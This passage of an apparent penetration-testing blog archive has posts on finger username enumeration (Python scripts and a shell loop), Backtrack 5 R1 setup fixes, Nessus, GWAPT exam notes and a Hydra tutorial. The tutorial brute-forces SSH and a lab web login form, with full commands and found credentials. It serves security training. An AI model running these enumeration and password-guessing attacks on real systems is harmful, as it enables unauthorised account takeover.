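    Skips the header line and the 'In real life: ???' line produced for names
    that match nothing. Because Solaris finger also matches the description
    field, one query can return several accounts (as 'user' did above).
    """
    found = []
    for line in reply.splitlines():
        line = line.rstrip()
        if not line or line.startswith(HEADER_PREFIX) or NOT_FOUND_MARK in line:
            continue
        login = line.split()[0]
        if login not in found:
            found.append(login)
    return found


def enumerate_users(host, wordlist, query=finger_query):
    """Run every word in the list through finger and collect unique logins.

    `query` is a parameter so the parsing logic can be exercised offline
    against constructed replies instead of a live host.
    """
    users = []
    for word in wordlist:
        for login in parse_logins(query(host, word)):
            if login not in users:
                users.append(login)
    return sorted(users)


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.69"
    wordfile = sys.argv[2] if len(sys.argv) > 2 else "usernames.txt"
    with open(wordfile) as fh:
        words = [w.strip() for w in fh if w.strip()]
    for user in enumerate_users(host, words):
        print(user)
```

Run it as <span style="font-family: 'Courier New', Courier, monospace;">python3 finger_enum.py 192.168.1.69 usernames.txt</span>; it prints the sorted, de-duplicated logins, which is the same result the shell loop produces after the final sort.<br />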
<br />
Given a list of candidate names in "usernames.txt", the following command-line for loop queries each one, drops the two header lines and any "???" not-found line, and appends the matching logins to a file (the "???" pattern is quoted so the shell does not try to expand it as a filename glob):<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">for name in $(cat usernames.txt); do finger "$name@192.168.1.69" | awk 'NR!=1 && NR!=2' | grep -v '???' | cut -d " " -f1 | sort -u >> foundnames.txt; done</span><br />
<div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br />
</span></div><div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">cat foundnames.txt | sort -u</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">adm</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">gdm</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">listen</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">lp</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">noaccess</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nobody</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nobody4</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">nuucp</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">postgres</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">root</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">smmsp</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">svctag</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">uucp</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: 
x-small;">webservd</span></div></div><div><br />
</div><div>A confirmed list of logins is useful enumeration: a later dictionary attack against SSH (for example) only has to try accounts that really exist, instead of guessing usernames as well as passwords, which makes it much quicker and generates far fewer failed-login log entries.</div><div><br />
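The finger protocol is simple enough to speak directly, which also makes the enumeration loop above easier to script and to test. Here is an added example (my own code, not from the original post): a plain-socket finger client, a parser for the reply format shown above, and an enumeration loop that keeps only the logins that matched. The sample replies are constructed to look like the output above, not captured from a real host, and the "???" convention for a non-matching query is taken from the grep -v in the shell loop.<br />

```python
"""Finger (RFC 1288) username enumeration: a plain-socket client, a parser for
the Solaris-style reply shown above, and a loop that keeps only real logins.
Added example; not the original post's code."""
import socket

FINGER_PORT = 79


def finger_query(host, user, port=FINGER_PORT, timeout=5.0):
    """Send one finger query ("<user>\\r\\n") and return the raw reply text.
    That is the whole protocol: TCP connect, one line out, read to EOF."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(user.encode("ascii", "ignore") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1")


def parse_finger_reply(reply):
    """Return the set of login names in a reply.

    Skips the "[host]" line and the column header, and skips any line that
    contains "???", which is what the server prints when the query matched
    no account (the same filter as "grep -v '???'" in the shell loop)."""
    logins = set()
    for line in reply.splitlines():
        line = line.strip()
        if not line or line.startswith("[") or line.startswith("Login"):
            continue
        if "???" in line:
            continue
        logins.add(line.split()[0])
    return logins


def enumerate_users(candidates, query):
    """Probe each candidate name and return the sorted union of logins seen.

    `query` is a callable name -> reply text, so the network client above can
    be swapped for canned replies when testing offline."""
    found = set()
    for name in candidates:
        found |= parse_finger_reply(query(name))
    return sorted(found)


# Constructed replies shaped like the output above (not captured from a real
# host). A single probe can match several accounts, as "user" does here.
NO_MATCH = "[192.168.1.69]\nLogin Name TTY Idle When Where\nzzzz ???\n"
SAMPLE_REPLIES = {
    "root": ("[192.168.1.69]\n"
             "Login Name TTY Idle When Where\n"
             "root Super-User console 2 Mon 07:55 :0\n"
             "root Super-User pts/3 2 Mon 08:29 :0.0\n"),
    "user": ("[192.168.1.69]\n"
             "Login Name TTY Idle When Where\n"
             "nobody NFS Anonymous Access < . . . . >\n"
             "noaccess No Access User < . . . . >\n"
             "nobody4 SunOS 4.x NFS Anonym < . . . . >\n"),
}


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        # Live use:  python3 finger_enum.py 192.168.1.69 usernames.txt
        host, wordlist = sys.argv[1], sys.argv[2]
        with open(wordlist) as fh:
            names = [n.strip() for n in fh if n.strip()]
        for login in enumerate_users(names, lambda n: finger_query(host, n)):
            print(login)
    else:
        # Offline demo against the constructed replies.
        for login in enumerate_users(["root", "user", "zzzz"],
                                     lambda n: SAMPLE_REPLIES.get(n, NO_MATCH)):
            print(login)
```

Because each query is one short TCP connection, the script is trivially rate-limited by adding a sleep in the loop if the target logs or tarpits finger requests.<br />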
</div>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com9tag:blogger.com,1999:blog-6428740549041097500.post-46289618060181523562011-08-29T10:24:00.003+01:002011-09-03T23:08:03.014+01:00Setting up Nessus in Backtrack 5 R1In an earlier post I described how to set up Nessus on Backtrack 5:<br />
<br />
<a href="http://insidetrust.blogspot.com/2011/05/easy-nessus-scan-for-beginner-with.html">http://insidetrust.blogspot.com/2011/05/easy-nessus-scan-for-beginner-with.html</a><br />
<br />
For some reason, BT 5 R1 does not come with Nessus installed by default, but it's easy to download and install.<br />
<br />
You will need to download Nessus from the following location:<br />
<br />
<a href="http://www.tenable.com/products/nessus/select-your-operating-system">http://www.tenable.com/products/nessus/select-your-operating-system</a><br />
<br />
(I used the Debian 64 bit package)<br />
<br />
Then install it with the following command:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">dpkg -i Nessus-4.4.1-debian5_amd64.deb</span><br />
<br />
Then you can simply follow the rest of the instructions in my <a href="http://insidetrust.blogspot.com/2011/05/easy-nessus-scan-for-beginner-with.html">original post</a>.<br />
<br />
<span style="color: #cc0000;">Update</span> - Of course, there is an easier way to do this ;o)<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">apt-get install nessus</span><br />
<br />
Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com22tag:blogger.com,1999:blog-6428740549041097500.post-8790452624496736732011-08-28T19:37:00.002+01:002011-08-28T21:37:55.760+01:00How good is your browser security?So, if you are reading this blog, you are probably interested in IT security (or insecurity, otherwise you are in the wrong place).<br />
<br />
<b>Is your browser secure?</b><br />
<br />
This is a great resource for testing browser security:<br />
<br />
<a href="https://browsercheck.qualys.com/">https://browsercheck.qualys.com/</a><br />
<br />
Run the above test on each of the browsers on your system (IE, Firefox, Chrome etc)<br />
<br />
If all is well you should get a screen which looks something like this:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitCI1p9tjaAkFv8u2SLyuBsJxgEeJvh00TTNgQkHFsP-dFSnkg6UBldB0uRcjEGmlU7yu0QAk0qhO-HMwh10NCyR7TCUHBZsPcusq9iCQPosj_6c3dF0QCKmPSp-oiKZicNP7iVbF2yGM/s1600/firefox-fixed.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitCI1p9tjaAkFv8u2SLyuBsJxgEeJvh00TTNgQkHFsP-dFSnkg6UBldB0uRcjEGmlU7yu0QAk0qhO-HMwh10NCyR7TCUHBZsPcusq9iCQPosj_6c3dF0QCKmPSp-oiKZicNP7iVbF2yGM/s400/firefox-fixed.png" width="378" /></a></div><br />
If you get a red bar, you are not up-to-date, and probably not fully secure for browsing. If this is the case then I recommend you follow the on-screen instructions to get this fixed.<br />
<br />
I would be interested to see how many people pass on the first attempt, and what measures others needed to take to get up-to-date.<br />
<br />
For me, running Backtrack 5 R1 (Linux), I needed to update Firefox and the Flash plugin.<br />
<br />
I have added explanations of how to upgrade to Firefox 6.x and also update the Flash plugin in my "Backtrack 5 R1 notes" at the following location:<br />
<br />
<a href="http://insidetrust.blogspot.com/2011/08/backtrack-5-r1-some-things-fixed-some.html">http://insidetrust.blogspot.com/2011/08/backtrack-5-r1-some-things-fixed-some.html</a><br />
<br />
I recommend anyone who is using Backtrack 5 R1 to apply the updates to help make their system more secure.<br />
<br />
I also run Chrome on this system, and my Chrome status looks like this (Shockwave Flash 11.0 is currently pre-release):<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNLu8mHG0AoJkmsJ8IaQRcDd-xFJGHvlJAK_Vqzaqnl7Ey9k36LiZJX_K9Zhvv9vpSAvPKTw_z1-m68wxj9A5y12LKAi0dbaXjHJUwWu-ypcgKMDzGhNIlJ98QSEiO0A-cg8i2rr_7Cps/s1600/chrome.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNLu8mHG0AoJkmsJ8IaQRcDd-xFJGHvlJAK_Vqzaqnl7Ey9k36LiZJX_K9Zhvv9vpSAvPKTw_z1-m68wxj9A5y12LKAi0dbaXjHJUwWu-ypcgKMDzGhNIlJ98QSEiO0A-cg8i2rr_7Cps/s400/chrome.png" width="400" /></a></div><br />
Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com5tag:blogger.com,1999:blog-6428740549041097500.post-69700282074629599382011-08-25T20:09:00.003+01:002011-08-25T20:36:45.622+01:00GIAC Web Application Penetration Tester (GWAPT)I took and passed the <a href="http://www.giac.org/certification/web-application-penetration-tester-gwapt">GIAC Web Application Penetration Tester (GWAPT)</a> exam today, so I thought I would write something about it (and the SANS course that supports it).<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7eNMcddkpqrkG6y_I3lV9he8vGtd5IOlY6zrMJ_IaiH_rhrXZLeKmAg7P-sBhFGQU_jA3bBF3SpXzl9TI35v70yhwNK5QqsfYWX3oejlgdqv_xX0a0J2CrmDkLB6tNUdc_dc01AHkx28/s1600/logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7eNMcddkpqrkG6y_I3lV9he8vGtd5IOlY6zrMJ_IaiH_rhrXZLeKmAg7P-sBhFGQU_jA3bBF3SpXzl9TI35v70yhwNK5QqsfYWX3oejlgdqv_xX0a0J2CrmDkLB6tNUdc_dc01AHkx28/s1600/logo.png" /></a></div><br />
<b>The SANS "Web Application Penetration Testing and Ethical Hacking" course coverage</b><br />
<br />
I had taken the SANS "on-demand" online version of their Web Application Penetration Testing course. I felt the online version of the course is a great format, because it gives you plenty of time to absorb the material and experiment in your own time.<br />
<br />
I had previously read the excellent book Web Application Hackers Handbook (which I would highly recommend, before considering the SANS course). There were a few key things on the SANS course that are not covered in that book (and vice versa).<br />
<div><br />
</div>On reflection, this course covers quite a lot of ground. It has the basics of various common attack vectors (such as SQL injection and XSS) but it goes beyond the norm in some areas (though some other attacks and detail seem to be missing).<br />
<br />
In addition to what is covered in the WAHH book, the SANS course covers subject areas such as:<br />
<br />
<ul><li>Decomposition and basic analysis of Java applets and Flash objects</li>
<li>Understanding AJAX</li>
<li>Various tools for spidering, and web-app vulnerability scanning</li>
<li>Exploitation frameworks</li>
</ul><br />
<br />
Most notably, the SANS course covers the basics of a lot of different tools for web-app security testing, including:<br />
<br />
Burpsuite, Webscarab, Paros, Dirbuster, Skipfish, W3af, Tamperdata, SQLinjectMe, Sqlmap, Grendel-scan, Nikto, Aura, SiteDigger, Wikto, Goolag Scanner, Maltego, Nmap, HTTPrint, OpenSSL, THC SSL Check, CeWL, SprAJAX, RatProxy, WebService Studio, WSDigger, WSFuzzer, Flare, HP SWFscan, SWFIntruder, JAD, Websecurify, XSS Me, GreaseMonkey, XSS Assistant, PostInterpreter, Absinthe, MonkeyFist, BeEF, Dursosploit, AttackAPI<br />
<br />
This is a lot of coverage, though obviously in many cases we are talking about the bare minimum of one slide of notes per tool (you will need to do a lot of your own practice and research to get to know these tools properly).<br />
<br />
Though I didn't feel the SANS audio track was as good as it could have been, the course notes and lab examples are good (if you complete them all a couple of times, and do some extra experimentation).<br />
<br />
In addition, I did a lot of my own testing with the Web Security Dojo, and some Virtual Appliance UI research in my home lab - which I feel helped me a lot with understanding how to use some of the tools more effectively.<br />
<br />
<br />
<b>Notes for GWAPT test-takers</b><br />
<br />
This is an open-book exam, which was a new thing for me. I would definitely recommend test-takers to study the SANS course thoroughly, and take their course material with them, because the exam sticks very closely to the SANS course material.<br />
<br />
Also, make sure you know which information is in which section of the course material, i.e. know where you would find information on SQL injection syntax, or PHP functions, or HTTP response codes (as examples).<br />
<br />
In terms of practice, the certification exam is similar to (but not as easy as) the example tests provided by GIAC. I would also recommend reading the course material a couple of times, completing all the course practicals, and doing extra practice with the tools, such as completing the Web Security Dojo (or Web Goat at the very least).Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com20tag:blogger.com,1999:blog-6428740549041097500.post-80038239155191833322011-08-23T11:18:00.019+01:002011-09-10T06:23:27.300+01:00Backtrack 5 R1 - Some things fixed, some things broken + workaroundsSometimes installing the latest releases is a good thing. You get to learn lots of new technology, and improve your understanding and troubleshooting skills at the same time.<br />
<br />
However, there is a cost in time, tweaking and fixing things, and learning new ways to do the same things you used to do. As I write this, Backtrack 5 R1 is only 3 days past its release, so there are bound to be some issues.<br />
<br />
<br />
<b>Pluses and minuses</b><br />
<br />
Some things seem to work a lot better (for example, I had none of the graphics-driver issues I usually get during a Backtrack install).<br />
<br />
However, some tools that were previously working fine seem to be broken (at least on the BT5 R1 KDE 64-bit version that I am currently looking at).<br />
<br />
<br />
Problems I have seen so far (and workarounds/fixes):<br />
<br />
<br />
<b>Wireshark not working</b><br />
<br />
Wireshark won't run - I got the following error:<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">wireshark: error while loading shared libraries: libwsutil.so.0: cannot open shared object file: No such file or director </span><br />
<br />
The Backtrack development team are aware of this, and currently in the process of developing a fix.<br />
<br />
<span style="color: #cc0000;">Fix</span> = Rebuild wireshark from source<br />
<br />
<span style="color: #cc0000;">Workaround</span> = Copy the following files, which fixes the problem:<br />
<div style="font-family: "Courier New",Courier,monospace;"><br />
</div><span style="font-family: "Courier New",Courier,monospace;">cp /usr/local/lib/libwsutil.so.1 /usr/lib/libwsutil.so.0</span><br />
<span style="font-family: "Courier New",Courier,monospace;">cp /usr/local/lib/libwiretap.so.1 /usr/lib/libwiretap.so.0</span><br />
<br />
<br />
<br />
<b>Nessus is missing</b><br />
<br />
<span class="Apple-style-span" style="color: #cc0000;">Fix</span> = Follow the instructions to download and install it here:<br />
<br />
<a href="http://insidetrust.blogspot.com/2011/08/setting-up-nessus-in-backtrack-5-r1.html">http://insidetrust.blogspot.com/2011/08/setting-up-nessus-in-backtrack-5-r1.html</a><br />
<br />
<br />
<b>VMware Player not working</b><br />
<br />
VMware Player will install, but not compile and run - with the following errors in "/tmp/vmware-root/setup-*.log": <br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">Failed to compile module vmmon</div><br />
This is pretty essential for my home lab - probably more an issue that VMware needs to fix, to make VMware Player work with the latest Linux kernel.<br />
<br />
<span style="color: #cc0000;">Workaround</span> = Use Oracle VirtualBox<br />
<br />
Download the "Ubuntu 10.04 LTS" version from here: <a href="http://www.virtualbox.org/wiki/Linux_Downloads">http://www.virtualbox.org/wiki/Linux_Downloads</a><br />
<br />
Run the following command to install it:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">dpkg -i virtualbox-4.1_4.1.2-73507~Ubuntu~lucid_amd64.deb</div><br />
If you already have VMware VMs, make a copy of them, then in VirtualBox add a new machine for each one and select the existing *.vmdk file when you come to add the disk.<br />
<br />
This seems to work pretty well, and has more or less the same features as VMware Player.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV0hFUSL9xzkBggm83QJOjFusDOUcFH8rx0nF8UqqFkd-tzpFh3cFj6ZJgs7GDzsreyA_UXyA8mewGoNi2KVbLdsiNwyXT1SXYQkvudKSIAqLHZbL0BO097DIklM6n7xVglvyy1Q3CwAQ/s1600/snapshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV0hFUSL9xzkBggm83QJOjFusDOUcFH8rx0nF8UqqFkd-tzpFh3cFj6ZJgs7GDzsreyA_UXyA8mewGoNi2KVbLdsiNwyXT1SXYQkvudKSIAqLHZbL0BO097DIklM6n7xVglvyy1Q3CwAQ/s400/snapshot2.png" width="400" /></a></div><div style="text-align: center;">(Guess which VM is the victim ;o) </div><br />
<br />
<span style="color: #cc0000;">Workaround2</span> = See comment from Anonymous below (untested at this time)<br />
<br />
<br />
<b>Grendel-scan not working</b><br />
<br />
Grendel-scan throws the following Java exception:<br />
<div style="font-family: "Courier New",Courier,monospace;"><br />
</div><span style="font-family: 'Courier New',Courier,monospace;">Exception in thread "main" java.lang.UnsatisfiedLinkError: no swt-gtk-3349 or swt-gtk in swt.library.path, java.library.path or the jar file</span><br />
<br />
TBD - I guess I can get along without this for a while.<br />
<br />
<br />
<b>Mozilla Firefox not up-to-date</b><br />
<br />
Firefox is not the latest version (which could potentially be a security risk).<br />
<br />
<span class="Apple-style-span" style="color: #cc0000;">Fix</span> = Run the firefox built-in updater (to upgrade to Firefox 6.x)<br />
<br />
<ul><li>In firefox, go to Help > About</li>
<li>Click on "Check for updates"</li>
<li>Click on "Apply updates"</li>
<li>Follow the instructions (this will require a restart of firefox)</li>
<li>Follow the instructions to update the version of no-script</li>
</ul><br />
<br />
<b>Installing flash player for Chrome and Firefox</b><br />
<br />
Flash plugins are missing for Chrome and Firefox.<br />
<br />
<span style="color: #cc0000;">Workaround</span> = Add the executable in the correct directories<br />
<br />
First download the kits at the following locations:<br />
<br />
<a href="http://labs.adobe.com/technologies/flashplatformruntimes/flashplayer11/">http://labs.adobe.com/technologies/flashplatformruntimes/flashplayer11/</a><br />
<a href="http://get.adobe.com/flashplayer/?no_redirect">http://get.adobe.com/flashplayer/?no_redirect</a><br />
<br />
Close both Chrome and Firefox and then do the following:<br />
<div style="font-family: "Courier New",Courier,monospace;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;">cd ~/Download</div><div style="font-family: "Courier New",Courier,monospace;">tar xvfz flashplayer11_b2_install_lin_64_080811.tar.gz</div><div style="font-family: "Courier New",Courier,monospace;">chown root:root libflashplayer.so<br />
chmod 0644 libflashplayer.so<br />
cp -f libflashplayer.so /usr/lib/mozilla/plugins/<br />
rm -f libflashplayer.so</div><div style="font-family: "Courier New",Courier,monospace;"><br />
</div><div style="font-family: "Courier New",Courier,monospace;">tar xvfz install_flash_player_10_linux.tar.gz<br />
mkdir -p ~/.mozilla/plugins<br />
chown root:root libflashplayer.so<br />
chmod 0644 libflashplayer.so<br />
mv -f libflashplayer.so ~/.mozilla/plugins/</div><br />
Restart the browsers and this should fix it<br />
<br />
<br />
<b>Crash issue</b><br />
<br />
I did have an issue where I think it went into screen-saver mode, where the system seemed to go into a graphics-card test screen and completely lock up (?! not sure on this one).<br />
<br />
Not seen this since<br />
<br />
<br />
<b>Suspend to disk causes failure to boot</b><br />
<br />
Yeah, this one is not much fun, seems persistent and I'm currently troubleshooting it... Hangs on red BT5 boot-loader screen.<br />
<br />
<span class="Apple-style-span" style="color: #cc0000;">Workaround</span> = Not sure, I re-installed my system, and have not seen the issue since. Weird.<br />
<br />
<br />
(I will add issues and workarounds as I find them in this post)Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com15tag:blogger.com,1999:blog-6428740549041097500.post-44134272127772265782011-08-22T13:34:00.007+01:002011-08-23T14:19:23.343+01:00Using Hydra to dictionary-attack web-based login formsHydra is an online password cracking tool which can be used to dictionary-attack various services by trying lists of user-names and passwords until a successful login is found. It is multi-threaded, and can be very fast, trying username/password combinations at a rate of thousands per minute.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhsXALeAfHUeXMgH54PrlNPb2748s8KynugHVuAnlFXLUJApih6oO6ABHWwCtaIo_G7u4PttLBv4nr1Z5Si8KFqzGIxE9QeVcqsUEwWmhPEkN6uGIsKnTicv6SXLjkiMq9nDTgLD1oKdk/s1600/xhydra.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhsXALeAfHUeXMgH54PrlNPb2748s8KynugHVuAnlFXLUJApih6oO6ABHWwCtaIo_G7u4PttLBv4nr1Z5Si8KFqzGIxE9QeVcqsUEwWmhPEkN6uGIsKnTicv6SXLjkiMq9nDTgLD1oKdk/s320/xhydra.png" width="320" /></a></div><br />
Hydra can be used to attack many different services including IMAP, SMB, HTTP, VNC, MS-SQL, MySQL, SMTP, SSH, <a href="http://freeworld.thc.org/">and many more.</a><br />
<br />
(Hydra is to online-cracking of passwords, what John The Ripper is to offline-cracking of password hashes)<br />
<br />
Often, web-based login forms authenticate using the HTTP POST method, but judging from several blogs I have read on this subject, it sounds like some people have great difficulty in getting Hydra to work effectively in this situation.<br />
<br />
I have had a great deal of success with hydra, so here I describe how to get Hydra working with web-based form logins. <br />
<br />
This attack is not limited to websites, and I would argue that it is more suited for gaining login access to software products that have a web UI, for example in penetration tests.<br />
<br />
<span style="color: #cc0000;">This tool should not be used to attack websites or services where you do not have permission to do so. Use this for legitimate testing purposes only.</span><br />
<br />
<br />
<b>Some differences between online and off-line password cracking</b><br />
<br />
There are significant differences between online and off-line password cracking. <br />
<br />
With off-line cracking, you have the hashes on your system, they are static, and you can try dictionary, hybrid, and brute-force attacks to your heart's content. You have as long as you want, and you can try many billions of attempts in a short space of time.<br />
<br />
The attack success is purely dependent on password strength, versus processor power and time (and few user-chosen passwords will be strong enough to last).<br />
<br />
With online password attacks there are more issues to consider, such as network bandwidth, account lockouts, tar-pitting, changing passwords, and detection in logs and IDS.<br />
<br />
Online attacks are more suited to relatively small and focused dictionary attacks rather than exhaustive brute-force.<br />
<br />
<br />
<b>A simple Hydra SSH example</b><br />
<br />
Here is a simple example of running a Hydra attack against an SSH server.<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">hydra 192.168.1.26 ssh2 -s 22 -P pass.txt -L users.txt -e ns -t 10</div><br />
This will attack the system 192.168.1.26 on port 22 with the SSH protocol, 10 threads at a time, and try all the combinations of usernames and passwords supplied in the files users.txt and pass.txt (plus empty passwords, and passwords the same as the username).<br />
<br />
This can take a while, so it is best to only use usernames you know exist, and a relatively small list of passwords (many thousands rather than many millions). This attack generally works very well for simple dictionary passwords.<br />
<br />
<br />
<b>Web-based login forms prerequisites</b><br />
<br />
For web-based forms, you have to know much more information about the form you are attacking before you start the attack. Every web-based form is slightly different, different URLs and parameters, and different responses for success or failure.<br />
<br />
You need to know:<br />
<ul><li>The hostname/IP and URL</li>
<li>Whether it is an HTTPS or HTTP service</li>
<li>Whether the form supports GET or POST (or both)</li>
<li>The parameters of the request</li>
<li>The difference in response between success and failure</li>
<li>Whether any session cookies are required to be set or maintained</li>
<li>What lockout features and thresholds are enabled (if any)</li>
</ul>Not knowing or understanding the above information can be a big cause of failure.<br />
<br />
For the parameters of the request, you can intercept and examine a normal login attempt with a web proxy (such as owasp-zap, webscarab or burpsuite) or use a browser plugin (such as tamperdata) or just look at the HTML form.<br />
<br />
<br />
<b>An example attack</b><br />
<br />
The <a href="http://sourceforge.net/projects/websecuritydojo/">Web Security Dojo</a> VM has various vulnerable applications that you can use to test these techniques. So looking at an example the w3af testing framework has a test login at the following location<br />
<br />
http://192.168.1.69/w3af/bruteforce/form_login/<br />
<br />
The important parts of the HTML form are:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><form name="input" action="<span class="Apple-style-span" style="color: #cc0000;">dataReceptor.php</span>" method="<span class="Apple-style-span" style="color: #cc0000;">post</span>"></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Username:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><input type="text" name="<span class="Apple-style-span" style="color: #cc0000;">user</span>"></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Password:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><input type="password" name="<span class="Apple-style-span" style="color: #cc0000;">pass</span>"></span><br />
<br />
If we put in one wrong username and password combination we get:<br />
<br />
<form action="<font class=" apple-style-span"="" color="#cc0000" name="input"><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><span class="Apple-style-span" style="color: #cc0000;">Bad login</span>, stop bruteforcing me!Bad u/p combination for user: a</span><br />
<br />
So, now we have the information we need to attack this login form, we can use this info to construct a Hydra brute-force attack as follows:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">hydra 192.168.1.69 http-form-post "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span><br />
If we break this up<br />
<br />
Host = 192.168.1.69<br />
Method = http-form-post<br />
URL = /w3af/bruteforce/form_login/dataReceptor.php<br />
Form parameters = user=^USER^&pass=^PASS^<br />
Failure response = Bad login<br />
Users file = users.txt<br />
Password file = pass.txt<br />
Threads = -t 10<br />
Wait for timeout = -w 30<br />
Output file = -o hydra-http-post-attack.txt<br />
<br />
Hydra basically iterates through all the username/password combinations, until it gets a response that does not contain the text "Bad login". When we run this attack we get:<br />
<br />
<div><br />
</div><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Hydra (http://www.thc.org/thc-hydra) starting at 2011-08-22 13:11:03</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">[DATA] 5 tasks, 1 servers, 5 login tries (l:5/p:1), ~1 tries per task</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">[DATA] attacking service http-post-form on port 80</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">[STATUS] attack finished for 192.168.1.69 (waiting for children to finish)</span><br />
<span class="Apple-style-span" style="color: #cc0000; font-family: 'Courier New',Courier,monospace;">[80][www-form] host: 192.168.1.69 login: admin password: 1234</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Hydra (http://www.thc.org/thc-hydra) finished at 2011-08-22 13:11:07</span><br />
<br />
As you can see, this was successful and found the user "admin" with password "1234".<br />
<br />
<br />
<b>Other examples</b><br />
<br />
HTTPS forms can be brute-forced in exactly the same way by changing the method to "https-form-post" (Hydra then defaults to port 443; use -s to specify a different port).<br />
<br />
Similarly there are the GET equivalents, of "http-get-form" and "https-get-form", though this type of method is really not recommended for web-based login forms (due to confidential information being passed in the URL, which can appear in proxy-logs, and browser history). Some forms do exist out there that use this.<br />
<br />
Sometimes you need to look for text that appears meaning "success" rather than the absence of text meaning "failure". If you put "S=" in front of the condition string, it becomes a success-string check instead of a failure-string check, for example:<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">"/login.php:user=^USER^&pass=^PASS^:S=successful"</span><br />
<br />
Remember that the "failure" or "success" string does not have to be part of the HTML of the page. These strings could be information in the response headers, such as cookies being set, or locations of redirects. There are flexible options for dealing with pretty much any type of response, as long as it is repeatable, and there are distinct differences between success and failure.<br />
<br />
More complex cases are where you need to send particular header values, or fetch an additional page first to pick up the cookies the server sets before the form is submitted. These can be handled by appending the extra parameters "C=" (cookie page) and "H=" (header) to the end of the string:<br />
<br />
